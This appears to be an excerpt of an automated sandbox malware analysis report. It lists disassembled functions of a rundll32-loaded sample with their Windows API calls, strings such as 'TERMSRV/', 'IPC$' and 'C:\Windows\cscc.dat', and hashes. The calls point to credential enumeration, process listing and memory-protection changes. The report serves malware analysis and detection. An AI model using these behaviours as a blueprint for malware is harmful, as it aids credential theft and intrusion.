                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Thread$Process$AllocCloseCreateErrorFreeHandleLastObjectResumeSingleTokenWait
                                                                      • String ID:
                                                                      • API String ID: 298440786-0
                                                                      • Opcode ID: e039ec2b0a4f00281f737f2202dc8aee0824b5b6745c8feb741e751c1d4d7e5c
                                                                      • Instruction ID: 39825bfe64a53a31b00d958abe4932a03e89443828b70f498c4670d15258627c
                                                                      • Opcode Fuzzy Hash: e039ec2b0a4f00281f737f2202dc8aee0824b5b6745c8feb741e751c1d4d7e5c
                                                                      • Instruction Fuzzy Hash: 18214FB6A00209FFDF01AFA8D88489EB7BDEF48314F104A65EE15F3160E734AE459B51
                                                                      Function 04856735 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 04856477: GetTickCount.KERNEL32 ref: 04856477
                                                                      • wsprintfW.USER32 ref: 04856758
                                                                      • EnterCriticalSection.KERNEL32(04867B9C,00007FD3,?,00000028), ref: 04856783
                                                                      • StrCatW.SHLWAPI(?,?), ref: 048567D1
                                                                      • StrCatW.SHLWAPI(?,04863B90), ref: 048567D7
                                                                      • SetLastError.KERNEL32(0000007A), ref: 048567DF
                                                                      • LeaveCriticalSection.KERNEL32(04867B9C), ref: 048567EA
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection$CountEnterErrorLastLeaveTickwsprintf
                                                                      • String ID:
                                                                      • API String ID: 230659905-0
                                                                      • Opcode ID: 5ca722918287174d7f1b5568b27afc01fcf9c7889284fe874d7116b4596092e0
                                                                      • Instruction ID: 326311ea51451d4ebd3daa2118c18df281d69f9eeb7e50e8aee9349a056b0b79
                                                                      • Opcode Fuzzy Hash: 5ca722918287174d7f1b5568b27afc01fcf9c7889284fe874d7116b4596092e0
                                                                      • Instruction Fuzzy Hash: BD1196316002049BDB107BA8DC49B9A77A9EF44355F448F51ED4AEB250FBB8BD04CBD1
                                                                      Function 0485A3B1 Relevance: 9.0, APIs: 6, Instructions: 44threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateThread.KERNEL32(00000000,00000000,0485A016,00000000,00000004,00000000), ref: 0485A3C9
                                                                      • SetThreadToken.ADVAPI32(?,?,?,?,04857B43,?,?,00000004,0485787C,00000000,000000FF), ref: 0485A3DD
                                                                      • ResumeThread.KERNEL32(?,?,?,04857B43,?,?,00000004,0485787C,00000000,000000FF), ref: 0485A3EA
                                                                      • GetLastError.KERNEL32(?,?,04857B43,?,?,00000004,0485787C,00000000,000000FF), ref: 0485A3F7
                                                                      • CloseHandle.KERNEL32(?,?,?,04857B43,?,?,00000004,0485787C,00000000,000000FF), ref: 0485A402
                                                                      • SetLastError.KERNEL32(00000057,?,?,04857B43,?,?,00000004,0485787C,00000000,000000FF), ref: 0485A411
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$ErrorLast$CloseCreateHandleResumeToken
                                                                      • String ID:
                                                                      • API String ID: 2435877492-0
                                                                      • Opcode ID: cc322912a56a5475c73ba6017b74f03782a06671b74a95acb1dd2b402a269a24
                                                                      • Instruction ID: a3aa943f5ae1f6ed41edab8bc45d207bc17842f760b099ad682d4fd21e466988
                                                                      • Opcode Fuzzy Hash: cc322912a56a5475c73ba6017b74f03782a06671b74a95acb1dd2b402a269a24
                                                                      • Instruction Fuzzy Hash: 77016235601218FBDB209FA5ED4CDAEBEBCEF85764B104A11FD05D2150D778AE41EAA0
                                                                      Function 0485796E Relevance: 9.0, APIs: 6, Instructions: 36threadsynchronizationCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateThread.KERNEL32(00000000,00000000,04857957,00000000,00000004,00000000), ref: 04857988
                                                                      • SetThreadToken.ADVAPI32(?,00000000,?,?,?,04857B4A,?,?,?,00000004,0485787C,00000000,000000FF), ref: 0485799C
                                                                      • ResumeThread.KERNEL32(?,?,?,?,04857B4A,?,?,?,00000004,0485787C,00000000,000000FF), ref: 048579A9
                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,04857B4A,?,?,?,00000004,0485787C,00000000,000000FF), ref: 048579B9
                                                                      • GetLastError.KERNEL32(?,?,?,04857B4A,?,?,?,00000004,0485787C,00000000,000000FF), ref: 048579C1
                                                                      • CloseHandle.KERNEL32(?,?,?,?,04857B4A,?,?,?,00000004,0485787C,00000000,000000FF), ref: 048579CA
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$CloseCreateErrorHandleLastObjectResumeSingleTokenWait
                                                                      • String ID:
                                                                      • API String ID: 1168161173-0
                                                                      • Opcode ID: 938853420387fcb7b0da16c723d8409da99296c76ec85b9f8d0e147c53ae9c45
                                                                      • Instruction ID: 39cde080878bfe827c68a40f132bb897ab3157d47bce7801cd716f27855c72d0
                                                                      • Opcode Fuzzy Hash: 938853420387fcb7b0da16c723d8409da99296c76ec85b9f8d0e147c53ae9c45
                                                                      • Instruction Fuzzy Hash: 5FF03C74540209FBEF01ABA0ED0AF9DBBBCEB00315F208A50BE11E10E0D77CEA409B24
                                                                      Function 04854E60 Relevance: 7.6, APIs: 6, Instructions: 91memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 04854E76
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04854E79
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 04854F2A
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854F2D
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 04854F32
                                                                      • HeapFree.KERNEL32(00000000), ref: 04854F35
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 3689955550-0
                                                                      • Opcode ID: ae253f1f0879306df35b4bf482783f87d6b477de2946b6da1ef2a8896fe3c344
                                                                      • Instruction ID: 58cd414253180711f37d331518c7c14c56ee89fd265fd9fdedfb6027da2fee12
                                                                      • Opcode Fuzzy Hash: ae253f1f0879306df35b4bf482783f87d6b477de2946b6da1ef2a8896fe3c344
                                                                      • Instruction Fuzzy Hash: F42125316843447AEB219F649C04FAF7FA8EF55715F008958E949DB2A0CA74A849C760
                                                                      Function 048550A2 Relevance: 7.6, APIs: 6, Instructions: 79memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000034,74DEF380,00000000,?,?,?,048552FD,?,?,?,?,?,?,?,00000000), ref: 048550B3
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,048552FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 048550BA
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,759A5200), ref: 04855148
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,048552FD,?,?,?,?,?,?,?,00000000,00000000), ref: 0485514F
                                                                      • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,?,00000000,000000FF,00000008,00000000,00000034,759A5200,?,?,?,048552FD,?), ref: 04855158
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,048552FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0485515F
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free$Alloc
                                                                      • String ID:
                                                                      • API String ID: 3689955550-0
                                                                      • Opcode ID: 99a93fb1a6d1342c6135740f0d5075146bd66cd10b20809ec25d4d7ca6765aad
                                                                      • Instruction ID: 8d488b7208f7095b64ee8147c7670a43acc99e7db94c8eaa61a17ab23a84b402
                                                                      • Opcode Fuzzy Hash: 99a93fb1a6d1342c6135740f0d5075146bd66cd10b20809ec25d4d7ca6765aad
                                                                      • Instruction Fuzzy Hash: 3921CF32540349BAFF129F94EC48FAA3BACEF44316F048845FE04AE190C6B5A918CB61
                                                                      Function 0485317C Relevance: 7.6, APIs: 6, Instructions: 57memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,00000200,?,?,?,?,048547E5,?,?,00000000,?,?,?,?,?,?), ref: 0485318E
                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,048547E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 04853195
                                                                      • rand.MSVCRT ref: 048531AF
                                                                      • rand.MSVCRT ref: 048531BD
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,000000FF,00000004,?,00000200,?,?,?,048547E5,?,?,00000000,?), ref: 048531F4
                                                                      • HeapFree.KERNEL32(00000000,?,?,?,048547E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 048531FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Processrand$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 1335519115-0
                                                                      • Opcode ID: db496e716a29ff357fb80c43debf675682e6e323427aad1bdac614550e7d3de7
                                                                      • Instruction ID: 6856d53def8823dfb93ba8905512d61e98fcbd9ec470b887d4b4a3c7159a7d85
                                                                      • Opcode Fuzzy Hash: db496e716a29ff357fb80c43debf675682e6e323427aad1bdac614550e7d3de7
                                                                      • Instruction Fuzzy Hash: EB11A532540305BBEB019BA9DC45F9EBFADEF45751F004459FE049B190CBB9A845C771
                                                                      Function 04859972 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 048588D3: PathFindFileNameW.SHLWAPI(04867BC8,75BF73E0,?,048595B2), ref: 048588E3
                                                                      • wsprintfW.USER32 ref: 04859AAF
                                                                      • wsprintfW.USER32 ref: 04859B0D
                                                                      • wsprintfW.USER32 ref: 04859B56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: wsprintf$FileFindNamePath
                                                                      • String ID: \"C:\Windows\%s\" #1
                                                                      • API String ID: 988121887-1875761687
                                                                      • Opcode ID: 1d423058f1ac74dd9e843566e479c2cc4e9f4e370f80bfbbc5aaa19753a7e1c1
                                                                      • Instruction ID: 2ad5b969dbd97de21c30bec472de5e484c2c148999bfe763152c011bf8f618cc
                                                                      • Opcode Fuzzy Hash: 1d423058f1ac74dd9e843566e479c2cc4e9f4e370f80bfbbc5aaa19753a7e1c1
                                                                      • Instruction Fuzzy Hash: 61518723E24358A5DB20DFD4E805BEFB775FF447A0F10615AEA04EB2A0F2B15940C79A
                                                                      Function 04856F7C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,?,04857170,00000000,?,04857AF8), ref: 04856F8E
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 04856F95
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AddressHandleModuleProc
                                                                      • String ID: IsWow64Process$kernel32.dll
                                                                      • API String ID: 1646373207-3024904723
                                                                      • Opcode ID: e7f76a75859f0ea96c697e1c27e1bea424b7e2fc8139426682f75344e158041a
                                                                      • Instruction ID: 64b0c3e47281de76c0458c5de8b0216ea9950543f8fad00a3ab07c8e62b0c5bd
                                                                      • Opcode Fuzzy Hash: e7f76a75859f0ea96c697e1c27e1bea424b7e2fc8139426682f75344e158041a
                                                                      • Instruction Fuzzy Hash: F7D01271640209BBDB50DB94DD0EE9DB7ADEB14749F508914B907E1140D7BCFB01DB25
                                                                      Function 04854B5D Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 305memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(00000008,?,74DEF380,759A5200,00000000,?,00000000,00000000,00000000), ref: 04854C14
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 04854C1B
                                                                      • rand.MSVCRT ref: 04854CE6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcessrand
                                                                      • String ID: 8
                                                                      • API String ID: 1878709018-4194326291
                                                                      • Opcode ID: 764f3e5d307d5fdb5ffb72a74adcd696d4e06ad242cb7dc00a3c37880e36ba47
                                                                      • Instruction ID: e04a02da249c60853f9ad280de3279547a521e1f95bc17c96fc191c2e8b2382e
                                                                      • Opcode Fuzzy Hash: 764f3e5d307d5fdb5ffb72a74adcd696d4e06ad242cb7dc00a3c37880e36ba47
                                                                      • Instruction Fuzzy Hash: 29B1F231A042669FCB168F6C84643F97FF1EF06718F2486D9E8C1EB251D635E98AC740
                                                                      Function 0485923F Relevance: 6.1, APIs: 4, Instructions: 89memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,?,?,?,048579FC,?,?,?), ref: 0485927B
                                                                      • memcpy.MSVCRT(00000000,?,?,?,?,?,?,?,?,048579FC,?,?,?), ref: 04859294
                                                                      • VirtualProtect.KERNEL32(00000000,?,00000004,?), ref: 04859303
                                                                      • VirtualFree.KERNEL32(00000000,?,00004000), ref: 04859323
                                                                        • Part of subcall function 04858F35: VirtualProtect.KERNEL32(00000000,?,00000002,00000000,00000000,00000000,00000000), ref: 04858F52
                                                                        • Part of subcall function 04858F35: VirtualProtect.KERNEL32(00000000,?,00000002,?,02C371B8), ref: 04858FB0
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Protect$AllocFreememcpy
                                                                      • String ID:
                                                                      • API String ID: 2644210-0
                                                                      • Opcode ID: e1e82932d3a52e08df541e57783612f7805ac8cb0767de63d1f5a802ef92d4f5
                                                                      • Instruction ID: 6b8f7f3ca573a092da31a97a252b72c2ae1c904b66fd77bcc715acf5aa81b6ba
                                                                      • Opcode Fuzzy Hash: e1e82932d3a52e08df541e57783612f7805ac8cb0767de63d1f5a802ef92d4f5
                                                                      • Instruction Fuzzy Hash: BC21B5B1600311EBEF209B6DAC44F9BB79CEB45755F041B19FD15E76A0EA78F8408AA0
                                                                      Function 0485855F Relevance: 6.1, APIs: 4, Instructions: 51processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 04858571
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0485858F
                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 048585E4
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 048585EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 420147892-0
                                                                      • Opcode ID: c89d6af5aa38a506028fd724feb06b4ab2fdca331e451b0b9d95b100f559e5f7
                                                                      • Instruction ID: 0af00f406a530d4a0fffb99691fdf697d43decbbc97598d854d6fb112de2eee7
                                                                      • Opcode Fuzzy Hash: c89d6af5aa38a506028fd724feb06b4ab2fdca331e451b0b9d95b100f559e5f7
                                                                      • Instruction Fuzzy Hash: 4501BE6150261467DA307B6C5C4CA6F769C9745320F544FD3ED16D20F0E624AA908E52
                                                                      Function 048576F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,0000FFFF), ref: 0485770B
                                                                      • CredFree.ADVAPI32(?,?,00000000,0000FFFF), ref: 048577C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Cred$EnumerateFree
                                                                      • String ID: TERMSRV/
                                                                      • API String ID: 3403564193-3001602198
                                                                      • Opcode ID: 6341afc8b1a7345c9c31e60c844f441f4260c4e1b57ff8e56bcdffa74a216fb7
                                                                      • Instruction ID: 5e8f283cfd073a4ed5b1ca61847c33fb02503d7f1c6b907066c683fc1ccff410
                                                                      • Opcode Fuzzy Hash: 6341afc8b1a7345c9c31e60c844f441f4260c4e1b57ff8e56bcdffa74a216fb7
                                                                      • Instruction Fuzzy Hash: 8E217E72A00109DFDF14DFA9D8C48AEBBBAFB44314F55CA6AD902E7221D370A985CB50
                                                                      Function 04859332 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: gethostbynamewsprintf
                                                                      • String ID: %u.%u.%u.%u
                                                                      • API String ID: 3411498959-1542503432
                                                                      • Opcode ID: d8b92f98a024fba06ac6a93a0b4cf5f17ad6551cf5ccb4c1ccdfb77ad6656b1e
                                                                      • Instruction ID: 3f997d8eba439d3c28d59d772171a9e4052e27580c93bffe9075644adcf60f7f
                                                                      • Opcode Fuzzy Hash: d8b92f98a024fba06ac6a93a0b4cf5f17ad6551cf5ccb4c1ccdfb77ad6656b1e
                                                                      • Instruction Fuzzy Hash: EDE09BB12041646F83051B59DC5CC76FFECDF0965270982D5FD89CB172C12DEA10EBA4
                                                                      Function 04857E69 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PathCombineW.SHLWAPI(?,C:\Windows\,cscc.dat,00000000,?,04857EA6,?), ref: 04857E7C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4850000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: C:\Windows\$cscc.dat
                                                                      • API String ID: 3422762182-1946977352
                                                                      • Opcode ID: b4ef5130a8444130c2a36ecbe1b053b24af8d8e7de3adc2ff866e5dcdb4e9126
                                                                      • Instruction ID: 66f1788dbf6b1993bbd5011b2da4dda2bde380f845eeafb427c354b1dabf9e60
                                                                      • Opcode Fuzzy Hash: b4ef5130a8444130c2a36ecbe1b053b24af8d8e7de3adc2ff866e5dcdb4e9126
                                                                      • Instruction Fuzzy Hash: D1C0127138032427555159956C05956BA9CDB16EA2740C621BE05D2500D5DDE8508AD9
                                                                      Function 0485641A Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,74D65350,?,74DF0F00), ref: 04856439
                                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 04856446
                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0485644D
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?), ref: 04856465
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.1763160749.0000000004851000.00000020.00001000.00020000.00000000.sdmp, Offset: 04850000, based on PE: true
                                                                      • Associated: 00000002.00000002.1763094965.0000000004850000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763238261.000000000485D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763258082.0000000004863000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000002.00000002.1763276462.0000000004869000.00000002.00001000.00020000.00000000.sdmpDownload File
